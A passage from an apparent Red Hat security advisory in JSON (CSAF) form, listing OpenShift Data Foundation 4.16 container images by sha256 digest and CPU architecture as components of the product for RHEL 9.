"product_reference": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64"
},
"product_reference": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x"
},
"product_reference": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
},
"product_reference": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x"
},
"product_reference": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le"
},
"product_reference": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64"
},
